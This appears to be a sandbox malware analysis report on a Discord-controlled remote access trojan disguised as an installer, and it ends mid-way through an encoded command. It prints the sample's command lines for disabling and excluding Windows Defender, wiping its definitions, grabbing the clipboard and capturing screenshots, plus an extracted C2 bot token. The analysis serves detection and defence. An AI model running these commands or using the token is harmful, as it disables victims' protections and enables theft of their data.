discordrat | 15f679670aade72a91e3d0596b334441402453e29d4e4f0af509967799bc6ee2

Analysis

max time kernel
113s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
22-02-2025 00:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MinicoInstaller.exe
Size

7.6MB
MD5

efc16c463c8b66799da69dadbd7a8124
SHA1

500670a66e445c8d3a467e14efde7991824b9ff2
SHA256

15f679670aade72a91e3d0596b334441402453e29d4e4f0af509967799bc6ee2
SHA512

927eb8421f66a85b7bb8041c5a1bbf2973b96f958cfa59a5ecb89ecd528cc5d91468eef3983976611a28da860f92295066dc4e377f8851fa83daab5f543df6e5
SSDEEP

196608:+trnrL9SPYoGavO2KaH/K1QFcG1cpRHneRNB3SuN1G/s:+BnrL9SrGan5H/KEupxU3VN1

Score

10^/10

discordrat collection credential_access defense_evasion discovery execution persistence rat rootkit spyware stealer upx

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTMzOTYyNDY0NTA5MDg3MzM5Ng.GSLke3.if1DF-bdxVyPF9XjyqM9CkH6lrVfd1LG6rrc0o
server_id
1339657624517349500

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat
Discordrat family
discordrat

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4316	powershell.exe
1356	powershell.exe
1240	powershell.exe
460	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	MinicoInstaller.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1460	cmd.exe
3440	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2352	MyRatBuilder(rename).exe
4836	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
1124	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe
3308	MyGrabberBuilt(rename).exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
4	discord.com
5	discord.com
13	discord.com
24	discord.com
27	discord.com
28	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2160	tasklist.exe
3836	tasklist.exe
2620	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023d95-50.dat	upx
behavioral2/memory/3308-55-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp	upx
behavioral2/files/0x0007000000023d93-76.dat	upx
behavioral2/files/0x0007000000023d88-75.dat	upx
behavioral2/memory/3308-95-0x00007FFC1B8B0000-0x00007FFC1B8BF000-memory.dmp	upx
behavioral2/memory/3308-94-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp	upx
behavioral2/files/0x0007000000023d8f-93.dat	upx
behavioral2/files/0x0007000000023d8e-92.dat	upx
behavioral2/files/0x0007000000023d8d-91.dat	upx
behavioral2/files/0x0007000000023d8c-90.dat	upx
behavioral2/files/0x0007000000023d8b-89.dat	upx
behavioral2/files/0x0007000000023d8a-88.dat	upx
behavioral2/files/0x0007000000023d89-87.dat	upx
behavioral2/files/0x0007000000023d87-86.dat	upx
behavioral2/files/0x0007000000023d9a-85.dat	upx
behavioral2/files/0x0007000000023d99-84.dat	upx
behavioral2/files/0x0007000000023d98-83.dat	upx
behavioral2/files/0x0007000000023d94-80.dat	upx
behavioral2/files/0x0007000000023d92-79.dat	upx
behavioral2/memory/3308-101-0x00007FFC17A00000-0x00007FFC17A2D000-memory.dmp	upx
behavioral2/memory/3308-103-0x00007FFC18620000-0x00007FFC1863A000-memory.dmp	upx
behavioral2/memory/3308-105-0x00007FFC17910000-0x00007FFC17934000-memory.dmp	upx
behavioral2/memory/3308-107-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp	upx
behavioral2/memory/3308-130-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp	upx
behavioral2/memory/3308-133-0x00007FFC17900000-0x00007FFC1790D000-memory.dmp	upx
behavioral2/memory/3308-141-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp	upx
behavioral2/memory/3308-140-0x00007FFC178F0000-0x00007FFC178FD000-memory.dmp	upx
behavioral2/memory/3308-139-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp	upx
behavioral2/memory/3308-138-0x00007FFC17130000-0x00007FFC17144000-memory.dmp	upx
behavioral2/memory/3308-137-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp	upx
behavioral2/memory/3308-129-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp	upx
behavioral2/memory/3308-128-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp	upx
behavioral2/memory/3308-127-0x00007FFC17B40000-0x00007FFC17B59000-memory.dmp	upx
behavioral2/memory/3308-349-0x00007FFC17910000-0x00007FFC17934000-memory.dmp	upx
behavioral2/memory/3308-362-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp	upx
behavioral2/memory/3308-376-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp	upx
behavioral2/memory/3308-375-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp	upx
behavioral2/memory/3308-371-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp	upx
behavioral2/memory/3308-370-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp	upx
behavioral2/memory/3308-361-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp	upx
behavioral2/memory/3308-372-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp	upx
behavioral2/memory/3308-424-0x00007FFC02AA0000-0x00007FFC02B6D000-memory.dmp	upx
behavioral2/memory/3308-427-0x00007FFC02050000-0x00007FFC0216B000-memory.dmp	upx
behavioral2/memory/3308-426-0x00007FFC17130000-0x00007FFC17144000-memory.dmp	upx
behavioral2/memory/3308-425-0x00007FFC02570000-0x00007FFC02A99000-memory.dmp	upx
behavioral2/memory/3308-423-0x00007FFC16F80000-0x00007FFC16FB3000-memory.dmp	upx
behavioral2/memory/3308-422-0x00007FFC17B40000-0x00007FFC17B59000-memory.dmp	upx
behavioral2/memory/3308-421-0x00007FFC02B70000-0x00007FFC02CEF000-memory.dmp	upx
behavioral2/memory/3308-420-0x00007FFC17910000-0x00007FFC17934000-memory.dmp	upx
behavioral2/memory/3308-419-0x00007FFC18620000-0x00007FFC1863A000-memory.dmp	upx
behavioral2/memory/3308-418-0x00007FFC17A00000-0x00007FFC17A2D000-memory.dmp	upx
behavioral2/memory/3308-417-0x00007FFC17900000-0x00007FFC1790D000-memory.dmp	upx
behavioral2/memory/3308-416-0x00007FFC17F30000-0x00007FFC17F55000-memory.dmp	upx
behavioral2/memory/3308-415-0x00007FFC178F0000-0x00007FFC178FD000-memory.dmp	upx
behavioral2/memory/3308-414-0x00007FFC1B8B0000-0x00007FFC1B8BF000-memory.dmp	upx
behavioral2/memory/3308-399-0x00007FFC042A0000-0x00007FFC04964000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\MyRatBuilder(rename).exe	MinicoInstaller.exe
File created	C:\Windows\MyGrabberBuilt(rename).exe	MinicoInstaller.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MinicoInstaller.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3468	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
436	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2596	powershell.exe
2596	powershell.exe
1356	powershell.exe
1356	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe
1356	powershell.exe
3440	powershell.exe
4744	powershell.exe
3440	powershell.exe
4744	powershell.exe
4744	powershell.exe
3440	powershell.exe
1240	powershell.exe
1240	powershell.exe
1240	powershell.exe
1544	powershell.exe
1544	powershell.exe
1544	powershell.exe
460	powershell.exe
460	powershell.exe
548	powershell.exe
548	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2352	MyRatBuilder(rename).exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeDebugPrivilege	2620	tasklist.exe
Token: SeDebugPrivilege	2160	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2780	WMIC.exe
Token: SeSecurityPrivilege	2780	WMIC.exe
Token: SeTakeOwnershipPrivilege	2780	WMIC.exe
Token: SeLoadDriverPrivilege	2780	WMIC.exe
Token: SeSystemProfilePrivilege	2780	WMIC.exe
Token: SeSystemtimePrivilege	2780	WMIC.exe
Token: SeProfSingleProcessPrivilege	2780	WMIC.exe
Token: SeIncBasePriorityPrivilege	2780	WMIC.exe
Token: SeCreatePagefilePrivilege	2780	WMIC.exe
Token: SeBackupPrivilege	2780	WMIC.exe
Token: SeRestorePrivilege	2780	WMIC.exe
Token: SeShutdownPrivilege	2780	WMIC.exe
Token: SeDebugPrivilege	2780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2780	WMIC.exe
Token: SeRemoteShutdownPrivilege	2780	WMIC.exe
Token: SeUndockPrivilege	2780	WMIC.exe
Token: SeManageVolumePrivilege	2780	WMIC.exe
Token: 33	2780	WMIC.exe
Token: 34	2780	WMIC.exe
Token: 35	2780	WMIC.exe
Token: 36	2780	WMIC.exe
Token: SeDebugPrivilege	3836	tasklist.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeIncreaseQuotaPrivilege	2780	WMIC.exe
Token: SeSecurityPrivilege	2780	WMIC.exe
Token: SeTakeOwnershipPrivilege	2780	WMIC.exe
Token: SeLoadDriverPrivilege	2780	WMIC.exe
Token: SeSystemProfilePrivilege	2780	WMIC.exe
Token: SeSystemtimePrivilege	2780	WMIC.exe
Token: SeProfSingleProcessPrivilege	2780	WMIC.exe
Token: SeIncBasePriorityPrivilege	2780	WMIC.exe
Token: SeCreatePagefilePrivilege	2780	WMIC.exe
Token: SeBackupPrivilege	2780	WMIC.exe
Token: SeRestorePrivilege	2780	WMIC.exe
Token: SeShutdownPrivilege	2780	WMIC.exe
Token: SeDebugPrivilege	2780	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2780	WMIC.exe
Token: SeRemoteShutdownPrivilege	2780	WMIC.exe
Token: SeUndockPrivilege	2780	WMIC.exe
Token: SeManageVolumePrivilege	2780	WMIC.exe
Token: 33	2780	WMIC.exe
Token: 34	2780	WMIC.exe
Token: 35	2780	WMIC.exe
Token: 36	2780	WMIC.exe
Token: SeDebugPrivilege	1240	powershell.exe
Token: SeDebugPrivilege	1544	powershell.exe
Token: SeIncreaseQuotaPrivilege	4640	WMIC.exe
Token: SeSecurityPrivilege	4640	WMIC.exe
Token: SeTakeOwnershipPrivilege	4640	WMIC.exe
Token: SeLoadDriverPrivilege	4640	WMIC.exe
Token: SeSystemProfilePrivilege	4640	WMIC.exe
Token: SeSystemtimePrivilege	4640	WMIC.exe
Token: SeProfSingleProcessPrivilege	4640	WMIC.exe
Token: SeIncBasePriorityPrivilege	4640	WMIC.exe
Token: SeCreatePagefilePrivilege	4640	WMIC.exe
Token: SeBackupPrivilege	4640	WMIC.exe
Token: SeRestorePrivilege	4640	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1628 wrote to memory of 2596	1628	MinicoInstaller.exe	87
PID 1628 wrote to memory of 2596	1628	MinicoInstaller.exe	87
PID 1628 wrote to memory of 2596	1628	MinicoInstaller.exe	87
PID 1628 wrote to memory of 2352	1628	MinicoInstaller.exe	89
PID 1628 wrote to memory of 2352	1628	MinicoInstaller.exe	89
PID 1628 wrote to memory of 4836	1628	MinicoInstaller.exe	90
PID 1628 wrote to memory of 4836	1628	MinicoInstaller.exe	90
PID 4836 wrote to memory of 3308	4836	MyGrabberBuilt(rename).exe	91
PID 4836 wrote to memory of 3308	4836	MyGrabberBuilt(rename).exe	91
PID 3308 wrote to memory of 3868	3308	MyGrabberBuilt(rename).exe	92
PID 3308 wrote to memory of 3868	3308	MyGrabberBuilt(rename).exe	92
PID 3308 wrote to memory of 4916	3308	MyGrabberBuilt(rename).exe	93
PID 3308 wrote to memory of 4916	3308	MyGrabberBuilt(rename).exe	93
PID 3308 wrote to memory of 228	3308	MyGrabberBuilt(rename).exe	94
PID 3308 wrote to memory of 228	3308	MyGrabberBuilt(rename).exe	94
PID 3868 wrote to memory of 4316	3868	cmd.exe	98
PID 3868 wrote to memory of 4316	3868	cmd.exe	98
PID 4916 wrote to memory of 1356	4916	cmd.exe	99
PID 4916 wrote to memory of 1356	4916	cmd.exe	99
PID 228 wrote to memory of 536	228	cmd.exe	100
PID 228 wrote to memory of 536	228	cmd.exe	100
PID 3308 wrote to memory of 2044	3308	MyGrabberBuilt(rename).exe	101
PID 3308 wrote to memory of 2044	3308	MyGrabberBuilt(rename).exe	101
PID 3308 wrote to memory of 4284	3308	MyGrabberBuilt(rename).exe	102
PID 3308 wrote to memory of 4284	3308	MyGrabberBuilt(rename).exe	102
PID 2044 wrote to memory of 2620	2044	cmd.exe	105
PID 2044 wrote to memory of 2620	2044	cmd.exe	105
PID 3308 wrote to memory of 3536	3308	MyGrabberBuilt(rename).exe	139
PID 3308 wrote to memory of 3536	3308	MyGrabberBuilt(rename).exe	139
PID 3308 wrote to memory of 1460	3308	MyGrabberBuilt(rename).exe	107
PID 3308 wrote to memory of 1460	3308	MyGrabberBuilt(rename).exe	107
PID 4284 wrote to memory of 2160	4284	cmd.exe	110
PID 4284 wrote to memory of 2160	4284	cmd.exe	110
PID 3308 wrote to memory of 4448	3308	MyGrabberBuilt(rename).exe	111
PID 3308 wrote to memory of 4448	3308	MyGrabberBuilt(rename).exe	111
PID 3308 wrote to memory of 1220	3308	MyGrabberBuilt(rename).exe	113
PID 3308 wrote to memory of 1220	3308	MyGrabberBuilt(rename).exe	113
PID 3308 wrote to memory of 3800	3308	MyGrabberBuilt(rename).exe	115
PID 3308 wrote to memory of 3800	3308	MyGrabberBuilt(rename).exe	115
PID 3308 wrote to memory of 2688	3308	MyGrabberBuilt(rename).exe	118
PID 3308 wrote to memory of 2688	3308	MyGrabberBuilt(rename).exe	118
PID 3536 wrote to memory of 2780	3536	cmd.exe	120
PID 3536 wrote to memory of 2780	3536	cmd.exe	120
PID 1460 wrote to memory of 3440	1460	cmd.exe	121
PID 1460 wrote to memory of 3440	1460	cmd.exe	121
PID 4448 wrote to memory of 3836	4448	cmd.exe	122
PID 4448 wrote to memory of 3836	4448	cmd.exe	122
PID 1220 wrote to memory of 2092	1220	cmd.exe	123
PID 1220 wrote to memory of 2092	1220	cmd.exe	123
PID 2688 wrote to memory of 4744	2688	cmd.exe	124
PID 2688 wrote to memory of 4744	2688	cmd.exe	124
PID 3800 wrote to memory of 436	3800	cmd.exe	125
PID 3800 wrote to memory of 436	3800	cmd.exe	125
PID 3308 wrote to memory of 4900	3308	MyGrabberBuilt(rename).exe	133
PID 3308 wrote to memory of 4900	3308	MyGrabberBuilt(rename).exe	133
PID 4900 wrote to memory of 460	4900	cmd.exe	128
PID 4900 wrote to memory of 460	4900	cmd.exe	128
PID 3308 wrote to memory of 4236	3308	MyGrabberBuilt(rename).exe	129
PID 3308 wrote to memory of 4236	3308	MyGrabberBuilt(rename).exe	129
PID 4236 wrote to memory of 5000	4236	cmd.exe	131
PID 4236 wrote to memory of 5000	4236	cmd.exe	131
PID 4744 wrote to memory of 3696	4744	powershell.exe	132
PID 4744 wrote to memory of 3696	4744	powershell.exe	132
PID 3308 wrote to memory of 4900	3308	MyGrabberBuilt(rename).exe	133

C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAZABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdwBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAYwBhACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2596
- C:\Windows\MyRatBuilder(rename).exe
  "C:\Windows\MyRatBuilder(rename).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\MyGrabberBuilt(rename).exe
  "C:\Windows\MyGrabberBuilt(rename).exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Windows\MyGrabberBuilt(rename).exe
    "C:\Windows\MyGrabberBuilt(rename).exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\MyGrabberBuilt(rename).exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\MyGrabberBuilt(rename).exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4316
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Message', 0, 'a', 0+16);close()""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:228
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Message', 0, 'a', 0+16);close()"
        5⤵
        
        PID:536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2044
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4284
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3536
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:1460
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4448
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3800
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:436
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZ